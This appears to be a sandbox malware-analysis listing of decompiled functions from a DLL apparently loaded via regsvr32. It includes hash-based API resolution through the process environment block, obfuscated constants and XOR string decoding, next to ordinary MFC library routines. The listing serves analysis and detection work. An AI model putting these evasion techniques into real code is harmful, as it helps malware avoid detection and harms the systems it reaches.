Uniqueness Score: -1.00%

Function 10004BB4 Relevance: .1, Instructions: 87
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E10004BB4(signed int* __ecx, void* __edx) {
				void* _t38;
				signed int _t40;
				signed int _t56;
				signed int _t57;
				signed int _t64;
				unsigned int _t65;
				unsigned int _t66;
				void* _t73;
				signed int* _t74;
				signed int* _t75;
				unsigned int _t77;
				signed int _t79;
				signed int _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_push( *(_t83 + 0x2c));
				_push( *(_t83 + 0x2c));
				_push( *(_t83 + 0x2c));
				_push(__ecx);
				E10009E7D(_t38);
				 *(_t83 + 0x28) = 0xe59a27;
				_t74 =  &(__ecx[1]);
				 *(_t83 + 0x28) =  *(_t83 + 0x28) << 0xc;
				 *(_t83 + 0x28) =  *(_t83 + 0x28) ^ 0x59a35371;
				 *(_t83 + 0x24) = 0xbf2298;
				 *(_t83 + 0x24) =  *(_t83 + 0x24) | 0x43da2daf;
				 *(_t83 + 0x24) =  *(_t83 + 0x24) >> 6;
				 *(_t83 + 0x24) =  *(_t83 + 0x24) >> 1;
				 *(_t83 + 0x24) =  *(_t83 + 0x24) ^ 0x0085b67f;
				_t40 =  *__ecx;
				_t75 =  &(_t74[1]);
				_t81 =  *_t74 ^ _t40;
				 *(_t83 + 0x2c) = _t40;
				 *(_t83 + 0x30) = _t81;
				_t77 =  !=  ? (_t81 + 0x00000001 & 0xfffffffc) + 4 : _t81 + 1;
				_t84 = _t83 + 0x10;
				_t56 = E1001EAA3(_t77 + _t77);
				 *(_t84 + 0x18) = _t56;
				if(_t56 != 0) {
					_t79 = _t56;
					_t73 =  >  ? 0 :  &(_t75[_t77 >> 2]) - _t75 + 3 >> 2;
					if(_t73 != 0) {
						_t57 =  *(_t84 + 0x18);
						_t82 = 0;
						do {
							_t64 =  *_t75;
							_t75 =  &(_t75[1]);
							_t65 = _t64 ^ _t57;
							 *_t79 = _t65 & 0x000000ff;
							_t79 = _t79 + 8;
							 *((short*)(_t79 - 6)) = _t65 >> 0x00000008 & 0x000000ff;
							_t66 = _t65 >> 0x10;
							_t82 = _t82 + 1;
							 *((short*)(_t79 - 4)) = _t66 & 0x000000ff;
							 *((short*)(_t79 - 2)) = _t66 >> 0x00000008 & 0x000000ff;
						} while (_t82 < _t73);
						_t56 =  *(_t84 + 0x14);
						_t81 =  *(_t84 + 0x1c);
					}
					 *((short*)(_t56 + _t81 * 2)) = 0;
				}
				return _t56;
			}

0x10004bbb
0x10004bbf
0x10004bc3
0x10004bc8
0x10004bc9
0x10004bce
0x10004bd6
0x10004bd9
0x10004bde
0x10004be6
0x10004bee
0x10004bf6
0x10004bfb
0x10004bff
0x10004c07
0x10004c0b
0x10004c0e
0x10004c10
0x10004c14
0x10004c28
0x10004c33
0x10004c3e
0x10004c40
0x10004c47
0x10004c51
0x10004c5f
0x10004c64
0x10004c66
0x10004c6a
0x10004c6c
0x10004c6c
0x10004c6e
0x10004c71
0x10004c76
0x10004c7e
0x10004c84
0x10004c88
0x10004c91
0x10004c92
0x10004c99
0x10004c9d
0x10004ca1
0x10004ca5
0x10004ca5
0x10004cab
0x10004cab
0x10004cb8

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ac2364c0c879a59a1484dc3437e6df65e6169a2cc900724db024aa88985df62
Instruction ID: 5c7dd3ff31d5e034738417870aadce803e5c9d7d0d22b1049b0cb88ac76e9875
Opcode Fuzzy Hash: 2ac2364c0c879a59a1484dc3437e6df65e6169a2cc900724db024aa88985df62
Instruction Fuzzy Hash: 7131ED726083048FD304DF69C88146AF7E0EFD8658F414A2DE989A3261DB71EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1001B215 Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E1001B215(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t60;
				intOrPtr* _t75;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				void* _t92;
				void* _t93;

				_t92 = __edx;
				_t93 = __ecx;
				E10009E7D(_t60);
				_v16 = 0xd80aff;
				_v16 = _v16 + 0xd19f;
				_v16 = _v16 >> 9;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0004c74c;
				_v12 = 0x99f59e;
				_v12 = _v12 ^ 0xe0883fa4;
				_t78 = 0x6a;
				_v12 = _v12 / _t78;
				_t79 = 0x1f;
				_v12 = _v12 / _t79;
				_v12 = _v12 ^ 0x001a27dd;
				_v20 = 0x329bee;
				_t80 = 0xd;
				_v20 = _v20 / _t80;
				_v20 = _v20 ^ 0x000e0f49;
				_v8 = 0x99f5fb;
				_t81 = 0x54;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 / _t81;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x00026ba8;
				_t75 = E1001BFF0(0x3c1c9a36, 0x34c, _t81, _t81, 0xb1803658);
				return  *_t75(_a16, _a4, _t92, _t93, __ecx, __edx, _a4, _a8, _a12, _a16, _a20);
			}

0x1001b220
0x1001b222
0x1001b232
0x1001b237
0x1001b240
0x1001b247
0x1001b24b
0x1001b24f
0x1001b256
0x1001b25d
0x1001b269
0x1001b26e
0x1001b276
0x1001b27b
0x1001b280
0x1001b287
0x1001b291
0x1001b296
0x1001b29b
0x1001b2a2
0x1001b2ad
0x1001b2b1
0x1001b2be
0x1001b2c1
0x1001b2c5
0x1001b2e4
0x1001b2fb

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac9937ade2595b12411a612341975a389cdc51a603c5d56b48dc1e97da90aa38
Instruction ID: f3cc197c50cf5db8f3fc888bad9f6b15f2a7411cb70082579e9d4c72f91b2820
Opcode Fuzzy Hash: ac9937ade2595b12411a612341975a389cdc51a603c5d56b48dc1e97da90aa38
Instruction Fuzzy Hash: 91212676E00208FFDF08DFA6C84A8DEBBB2EB84314F108099E514AB250D7B59A649F50

Uniqueness

Uniqueness Score: -1.00%

Function 10021AE9 Relevance: .1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10021AE9(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t79;

				_v16 = 0x1b40b9;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x06da3224;
				_v8 = 0xdaa20c;
				_v8 = _v8 ^ 0x98850bc5;
				_t68 = 0x35;
				_v8 = _v8 * 0x35;
				_v8 = _v8 + 0xa9c1;
				_v8 = _v8 ^ 0x8bc81158;
				_v12 = 0xd1c1a;
				_v12 = _v12 + 0xf8f4;
				_v12 = _v12 / _t68;
				_v12 = _v12 ^ 0x000bb185;
				_v28 = 0x5467e;
				_v28 = _v28 ^ 0x8b7be63f;
				_v28 = _v28 ^ 0x8b7b22a8;
				_v24 = 0x3afde9;
				_t69 = 0x15;
				_v24 = _v24 * 0x37;
				_v24 = _v24 ^ 0x0cac149e;
				_v20 = 0x89c0f3;
				_v20 = _v20 / _t69;
				_v20 = _v20 ^ 0x0008e592;
				_t77 =  *((intOrPtr*)(E1001AA52() + 0xc)) + 0xc;
				_t78 =  *_t77;
				while(_t78 != _t77) {
					_t64 = E100140AF(_v12, _v28, _v24,  *((intOrPtr*)(_t78 + 0x30)), _v20);
					_t79 = _t79 + 0xc;
					if((_t64 ^ 0x23feca30) == _a4) {
						return  *((intOrPtr*)(_t78 + 0x18));
					}
					_t78 =  *_t78;
				}
				return 0;
			}

0x10021aef
0x10021af8
0x10021afc
0x10021b03
0x10021b0a
0x10021b19
0x10021b1a
0x10021b1d
0x10021b24
0x10021b2b
0x10021b32
0x10021b40
0x10021b45
0x10021b4c
0x10021b53
0x10021b5a
0x10021b61
0x10021b6c
0x10021b6d
0x10021b70
0x10021b77
0x10021b83
0x10021b86
0x10021b9b
0x10021b9e
0x10021bc5
0x10021bb1
0x10021bbb
0x10021bc1
0x00000000
0x10021bd1
0x10021bc3
0x10021bc3
0x00000000

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a09edeaa4adc7f730ea249c7ab70c289927a96af4fe0739337b0e9d1ea23ec
Instruction ID: e19f1987318b4e28c3f4c33efbf0f8bd90d255108f6e5fa02c84aad672579e5a
Opcode Fuzzy Hash: 65a09edeaa4adc7f730ea249c7ab70c289927a96af4fe0739337b0e9d1ea23ec
Instruction Fuzzy Hash: C3212635E0120AEBCB55CFA8E9468DEBBF1FB80314F208499D415B7210E7746B449F81

Uniqueness

Uniqueness Score: -1.00%

Function 1001AA52 Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001AA52() {

				return  *[fs:0x30];
			}

0x1001aa58

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6DA22B00 Relevance: 52.6, APIs: 14, Strings: 16, Instructions: 114
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DA22B00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t41;
				void* _t54;
				void* _t56;
				void* _t71;
				void* _t72;
				signed int _t73;
				void* _t74;
				void* _t75;

				_t72 = __esi;
				_t71 = __edi;
				_t56 = __ebx;
				_push(0xffffffff);
				_push(E6DA6DD30);
				_push( *[fs:0x0]);
				_t75 = _t74 - 0x14;
				_t41 =  *0x6da82744; // 0x616b45bb
				_push(_t41 ^ _t73);
				 *[fs:0x0] =  &_v16;
				E6DA212E0( &_v20);
				_v8 = 0;
				_v28 = _a4;
				_t77 = _v28 - 0x20;
				if(_v28 > 0x20) {
					L15:
					_t25 =  &_v20; // 0x20
					E6DA21AF0(_t25, _t25, "Unknown Error (%d) occurred.", _a4);
					_t75 = _t75 + 0xc;
				} else {
					_t8 = _v28 + 0x6da22ce0; // 0xcccccc0c
					switch( *((intOrPtr*)(( *_t8 & 0x000000ff) * 4 +  &M6DA22CA8))) {
						case 0:
							E6DA21340( &_v20, "The operating system is out\nof memory or resources.");
							goto L16;
						case 1:
							_t12 =  &_v20; // 0x20
							__ecx = _t12;
							E6DA21340(_t12, "The specified file was not found.");
							goto L16;
						case 2:
							_t13 =  &_v20; // 0x20
							__ecx = _t13;
							E6DA21340(_t13, "The specified path was not found.");
							goto L16;
						case 3:
							_t15 =  &_v20; // 0x20
							__ecx = _t15;
							E6DA21340(_t15, "The operating system denied\naccess to the specified file.");
							goto L16;
						case 4:
							_t22 =  &_v20; // 0x20
							__ecx = _t22;
							E6DA21340(_t22, "There was not enough memory to complete the operation.");
							goto L16;
						case 5:
							_t14 =  &_v20; // 0x20
							__ecx = _t14;
							E6DA21340(_t14, "The .EXE file is invalid\n(non-Win32 .EXE or error in .EXE image).");
							goto L16;
						case 6:
							_t23 =  &_v20; // 0x20
							__ecx = _t23;
							E6DA21340(_t23, "A sharing violation occurred. ");
							goto L16;
						case 7:
							_t16 =  &_v20; // 0x20
							__ecx = _t16;
							E6DA21340(_t16, "The filename association is\nincomplete or invalid.");
							goto L16;
						case 8:
							_t19 =  &_v20; // 0x20
							__ecx = _t19;
							E6DA21340(_t19, "The DDE transaction could not\nbe completed because the request timed out.");
							goto L16;
						case 9:
							_t18 =  &_v20; // 0x20
							__ecx = _t18;
							E6DA21340(_t18, "The DDE transaction failed.");
							goto L16;
						case 0xa:
							_t17 =  &_v20; // 0x20
							__ecx = _t17;
							E6DA21340(_t17, "The DDE transaction could not\nbe completed because other DDE transactions\nwere being processed.");
							goto L16;
						case 0xb:
							_t21 =  &_v20; // 0x20
							__ecx = _t21;
							E6DA21340(_t21, "There is no application associated\nwith the given filename extension.");
							goto L16;
						case 0xc:
							_t20 =  &_v20; // 0x20
							__ecx = _t20;
							E6DA21340(_t20, "The specified dynamic-link library was not found.");
							goto L16;
						case 0xd:
							goto L15;
					}
				}
				L16:
				_v32 = E6DA22F70(_t77,  &_v24, "Can\'t open link:\n\n",  &_v20);
				_v36 = _v32;
				_v8 = 1;
				E6DA22F30( &_v20, _v36);
				_v8 = 0;
				E6DA21320( &_v24);
				E6DA45AF0(_t56, _t71, _t72, _t77, E6DA23020( &_v20), 0x30, 0);
				_v8 = 0xffffffff;
				_t54 = E6DA21320( &_v20);
				 *[fs:0x0] = _v16;
				return _t54;
			}

0x6da22b00
0x6da22b00
0x6da22b00
0x6da22b03
0x6da22b05
0x6da22b10
0x6da22b11
0x6da22b14
0x6da22b1b
0x6da22b1f
0x6da22b28
0x6da22b2d
0x6da22b37
0x6da22b3a
0x6da22b3e
0x6da22c27
0x6da22c30
0x6da22c34
0x6da22c39
0x6da22b44
0x6da22b47
0x6da22b4e
0x00000000
0x6da22b5d
0x00000000
0x00000000
0x6da22b6c
0x6da22b6c
0x6da22b6f
0x00000000
0x00000000
0x6da22b7e
0x6da22b7e
0x6da22b81
0x00000000
0x00000000
0x6da22ba2
0x6da22ba2
0x6da22ba5
0x00000000
0x00000000
0x6da22c0e
0x6da22c0e
0x6da22c11
0x00000000
0x00000000
0x6da22b90
0x6da22b90
0x6da22b93
0x00000000
0x00000000
0x6da22c1d
0x6da22c1d
0x6da22c20
0x00000000
0x00000000
0x6da22bb4
0x6da22bb4
0x6da22bb7
0x00000000
0x00000000
0x6da22be1
0x6da22be1
0x6da22be4
0x00000000
0x00000000
0x6da22bd2
0x6da22bd2
0x6da22bd5
0x00000000
0x00000000
0x6da22bc3
0x6da22bc3
0x6da22bc6
0x00000000
0x00000000
0x6da22bff
0x6da22bff
0x6da22c02
0x00000000
0x00000000
0x6da22bf0
0x6da22bf0
0x6da22bf3
0x00000000
0x00000000
0x00000000
0x00000000
0x6da22b4e
0x6da22c3c
0x6da22c51
0x6da22c57
0x6da22c5a
0x6da22c65
0x6da22c6a
0x6da22c71
0x6da22c83
0x6da22c88
0x6da22c92
0x6da22c9a
0x6da22ca5

APIs

_DebugHeapAllocator.LIBCPMTD ref: 6DA22B5D
_DebugHeapAllocator.LIBCPMTD ref: 6DA22B6F
_DebugHeapAllocator.LIBCPMTD ref: 6DA22B81
_DebugHeapAllocator.LIBCPMTD ref: 6DA22B93
_DebugHeapAllocator.LIBCPMTD ref: 6DA22BA5
_DebugHeapAllocator.LIBCPMTD ref: 6DA22BB7
_DebugHeapAllocator.LIBCPMTD ref: 6DA22BC6
_DebugHeapAllocator.LIBCPMTD ref: 6DA22BD5
_DebugHeapAllocator.LIBCPMTD ref: 6DA22BE4
_DebugHeapAllocator.LIBCPMTD ref: 6DA22BF3
_DebugHeapAllocator.LIBCPMTD ref: 6DA22C02
_DebugHeapAllocator.LIBCPMTD ref: 6DA22C11
_DebugHeapAllocator.LIBCPMTD ref: 6DA22C20
_DebugHeapAllocator.LIBCPMTD ref: 6DA22C65

Strings

The .EXE file is invalid(non-Win32 .EXE or error in .EXE image)., xrefs: 6DA22B8B
The specified file was not found., xrefs: 6DA22B67
There was not enough memory to complete the operation., xrefs: 6DA22C09
The operating system deniedaccess to the specified file., xrefs: 6DA22B9D
The operating system is outof memory or resources., xrefs: 6DA22B55
A sharing violation occurred. , xrefs: 6DA22C18
, xrefs: 6DA22B3A
The filename association isincomplete or invalid., xrefs: 6DA22BAF
Can't open link:, xrefs: 6DA22C40
The DDE transaction could notbe completed because the request timed out., xrefs: 6DA22BDC
The specified dynamic-link library was not found., xrefs: 6DA22BEB
The DDE transaction failed., xrefs: 6DA22BCD
Unknown Error (%d) occurred., xrefs: 6DA22C2B
There is no application associatedwith the given filename extension., xrefs: 6DA22BFA
The DDE transaction could notbe completed because other DDE transactionswere being processed., xrefs: 6DA22BBE
The specified path was not found., xrefs: 6DA22B79

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AllocatorDebugHeap
String ID: $A sharing violation occurred. $Can't open link:$The .EXE file is invalid(non-Win32 .EXE or error in .EXE image).$The DDE transaction could notbe completed because other DDE transactionswere being processed.$The DDE transaction could notbe completed because the request timed out.$The DDE transaction failed.$The filename association isincomplete or invalid.$The operating system deniedaccess to the specified file.$The operating system is outof memory or resources.$The specified dynamic-link library was not found.$The specified file was not found.$The specified path was not found.$There is no application associatedwith the given filename extension.$There was not enough memory to complete the operation.$Unknown Error (%d) occurred.
API String ID: 571936431-1605189352
Opcode ID: 2aa0298a162878030247c402c7b99d9154721786585e5d67b1a20965bb402f81
Instruction ID: 831d50a56c2078c9cab352ba8e2f8cd959302f75c05712dd3474a3256ed6e985
Opcode Fuzzy Hash: 2aa0298a162878030247c402c7b99d9154721786585e5d67b1a20965bb402f81
Instruction Fuzzy Hash: E5419D30A2C109DECB64EF96CE50AFFB730BB21344F494829A521621C2DB3A2BC5CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6DA583E7 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 45
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA583E7(intOrPtr* __ecx) {
				intOrPtr* _t26;

				_t26 = __ecx;
				 *_t26 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t26 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t26 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t26 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t26 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t26 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t26 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t26 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t26 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t26 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t26 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t26 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t26;
			}

0x6da583f6
0x6da583ff
0x6da58408
0x6da58412
0x6da5841c
0x6da58426
0x6da58430
0x6da5843a
0x6da58444
0x6da5844e
0x6da58458
0x6da58462
0x6da58467
0x6da5846e

APIs

RegisterClipboardFormatA.USER32(Native), ref: 6DA583F8
RegisterClipboardFormatA.USER32(OwnerLink), ref: 6DA58401
RegisterClipboardFormatA.USER32(ObjectLink), ref: 6DA5840B
RegisterClipboardFormatA.USER32(Embedded Object), ref: 6DA58415
RegisterClipboardFormatA.USER32(Embed Source), ref: 6DA5841F
RegisterClipboardFormatA.USER32(Link Source), ref: 6DA58429
RegisterClipboardFormatA.USER32(Object Descriptor), ref: 6DA58433
RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 6DA5843D
RegisterClipboardFormatA.USER32(FileName), ref: 6DA58447
RegisterClipboardFormatA.USER32(FileNameW), ref: 6DA58451
RegisterClipboardFormatA.USER32(Rich Text Format), ref: 6DA5845B
RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 6DA58465

Strings

Object Descriptor, xrefs: 6DA5842B
Native, xrefs: 6DA583F1
FileNameW, xrefs: 6DA58449
Link Source Descriptor, xrefs: 6DA58435
Link Source, xrefs: 6DA58421
RichEdit Text and Objects, xrefs: 6DA5845D
ObjectLink, xrefs: 6DA58403
FileName, xrefs: 6DA5843F
Embedded Object, xrefs: 6DA5840D
Embed Source, xrefs: 6DA58417
Rich Text Format, xrefs: 6DA58453
OwnerLink, xrefs: 6DA583FA

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: 13dadfc6462b30c9d469f6a4852452e52ed6ec012a4a3e227824374e977df377
Instruction ID: e88f67b3ff7dab67c314606da67e5c8f4e0826346880d9758b96b674031bec6f
Opcode Fuzzy Hash: 13dadfc6462b30c9d469f6a4852452e52ed6ec012a4a3e227824374e977df377
Instruction Fuzzy Hash: 0B01B4B9D09769BECB30AF769C0C816BFA0FD59360310492BE01887A01D7B8E490CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 6DA41F7C Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6DA41F7C(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				signed int _t56;
				signed int _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				signed int _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E6DA5C876(E6DA6E18D, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(E6DA3ED9D);
				 *(_t116 - 0x120) = _t110;
				_t54 = E6DA4A4F0(_t94, 0x6da858d0, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				if(_t120 == 0) {
					_t54 = E6DA44898(_t97);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t56 =  *(E6DA4984E(_t94, _t106, _t111, __eflags) + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					__eflags = _t111;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x6da85b64;
						if( *0x6da85b64 == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x6da8573c;
								if( *0x6da8573c != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x6da8573c; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										 *(_t116 - 0x14) = _t59;
										__eflags = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E6DA41E2F);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E6DA5C5A0(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E6DA3EF50(_t94, _t97, _t106, "#32768", __eflags);
								 *0x6da8573c = _t72;
								__eflags = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E6DA5C741(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E6DA4989A(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E6DA4063F(_t111, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf8))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E6DA40D84);
							__eflags = _t83 - E6DA40D84;
							if(_t83 != E6DA40D84) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E6DA490A7();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E6DA3F221(_t87, "ime");
						_pop(_t97);
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E6DA5C8F9(_t94, _t105, _t110);
				}
			}

0x6da41f7c
0x6da41f7c
0x6da41f7c
0x6da41f86
0x6da41f8b
0x6da41f8e
0x6da41f91
0x6da41f9b
0x6da41fa1
0x6da41fa8
